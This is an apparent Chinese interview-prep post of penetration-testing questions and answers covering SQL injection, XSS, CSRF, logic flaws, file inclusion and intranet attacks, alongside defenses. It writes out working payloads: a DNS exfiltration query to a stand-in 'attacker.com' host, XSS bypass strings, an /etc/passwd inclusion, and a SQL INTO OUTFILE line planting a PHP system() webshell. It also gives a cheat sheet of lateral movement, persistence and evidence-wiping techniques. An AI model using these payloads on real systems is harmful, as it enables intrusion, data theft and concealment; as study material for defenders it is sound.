2025年渗透测试面试题总结-55(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2. SQL注入盲注方法
3. SQL注入防护措施
4. XSS攻防全景
5. 同源策略(SOP)本质
6. CSRF攻击与防护
7. 逻辑漏洞大全
8. 文件包含 & 变量覆盖
9. SQL注入写WebShell
10. 内网渗透速查表
2、SQL注入盲注的方法 3、如何防范SQL注入 4、xxs有哪些和绕过方式以及防护方式 5、同源性法制你了解吗 6、csrf可以干什么怎么防护 7、逻辑漏洞有哪些 8、文件包含以及变量覆盖 9、SQL注入如何写shell 10、内网渗透
2. SQL注入盲注方法
核心原理:无回显时通过条件判断提取数据
类型 技术手段 工具 布尔盲注 构造True/False条件(如 id=1 AND SUBSTR(database(),1,1)='a'
),根据页面差异推断sqlmap、Burp Intruder 时间盲注 利用延时函数( SLEEP(2)
),响应时间判断条件成立IF(1,SLEEP(5),0)
+ 时间统计DNSLog外带 触发DNS查询泄露数据( LOAD_FILE(CONCAT('\\\\',(SELECT user()),'.attacker.com\\a'))
)DNSLog平台
3. SQL注入防护措施
分层防御体系:
- 输入处理
- 参数化查询(
PreparedStatement
)- 严格白名单校验(如邮箱格式:
/^[a-z0-9_@.-]+$/i
)- 权限控制
- 数据库账户降权(禁用
FILE
、EXECUTE
权限)- 最小化错误信息暴露
- 运行时防护
- WAF规则(拦截
UNION SELECT
、xp_cmdshell
等特征)- RASP(运行时应用自保护)实时阻断注入行为
4. XSS攻防全景
攻击类型与绕过:
类型 绕过案例 防护方案 反射型XSS 编码绕过: <img src=x onerror=alert(1)>
输入过滤 + 输出HTML实体化 存储型XSS SVG标签注入: <svg><script>...</script>
CSP策略: default-src 'self'
DOM型XSS 利用 eval()
或location.hash
执行避免客户端动态解析不可信数据 进阶绕过技术:
- Unicode编码:
\u003cscript\u003e...
- 事件处理器变形:
onmouseover
→onmo%75seover
5. 同源策略(SOP)本质
定义:限制不同源(协议+域名+端口)的脚本访问对方资源
关键限制:
- 禁止读取跨域AJAX响应(除非CORS)
- 禁止操作跨域iframe DOM(可通过
postMessage
通信)
渗透影响:- 绕过SOP需依赖服务端漏洞(如JSONP劫持、CORS配置错误)
6. CSRF攻击与防护
攻击流程:
mermaid
sequenceDiagram 用户-->恶意网站: 点击钓鱼链接 恶意网站-->目标网站: 伪造请求(自动携带Cookie) 目标网站-->用户: 执行恶意操作(转账/改密)
防护方案:
- Token验证:表单中嵌入随机Token(服务端校验)
- SameSite Cookie:设置
SameSite=Strict
- 关键操作二次验证:密码确认/短信验证码
7. 逻辑漏洞大全
四大高危场景:
- 权限控制缺失
- 垂直越权:普通用户访问管理员API(
/admin/deleteUser?id=任意ID
)- 业务流绕过
- 支付漏洞:修改商品价格为0(抓包篡改
price=0
)- 竞争条件
- 并发充值:无限重复请求导致余额倍增
- 验证机制缺陷
- 密码重置Token未失效(重复使用或可预测)
8. 文件包含 & 变量覆盖
漏洞类型:
漏洞 案例 防护 文件包含 include($_GET['file'])
→?file=/etc/passwd
禁用动态包含 + 白名单控制 变量覆盖 extract($_POST)
覆盖$is_admin
变量避免 extract()
/parse_str()
9. SQL注入写WebShell
前提条件:
- 数据库有
FILE
权限 + Web目录可写 + 知道绝对路径
操作步骤:sql
1. 查询路径:SELECT @@basedir; -- 获取安装路径 2. 写入Shell: UNION SELECT "<?php system($_GET['c']);?>", NULL INTO OUTFILE '/var/www/shell.php' 3. 访问执行:http://target.com/shell.php?c=id
绕过技巧:
- 十六进制编码:
SELECT 0x3C3F706870... INTO OUTFILE
- 分块写入:使用
filesplit
函数绕过长度限制
10. 内网渗透速查表
攻击链五阶段:
阶段 工具/技术 目标 信息收集 Responder(LLMNR毒化)、BloodHound 绘制域拓扑 横向移动 Pass-the-Hash、Kerberoasting攻击 获取域控权限 持久化 Golden Ticket、Shadow Copy后门 维持长期控制 数据渗出 DNS隧道(dnscat2)、ICMP隐蔽信道 绕过流量监控 痕迹清理 Meterpreter的 timestomp
、日志注入消除入侵证据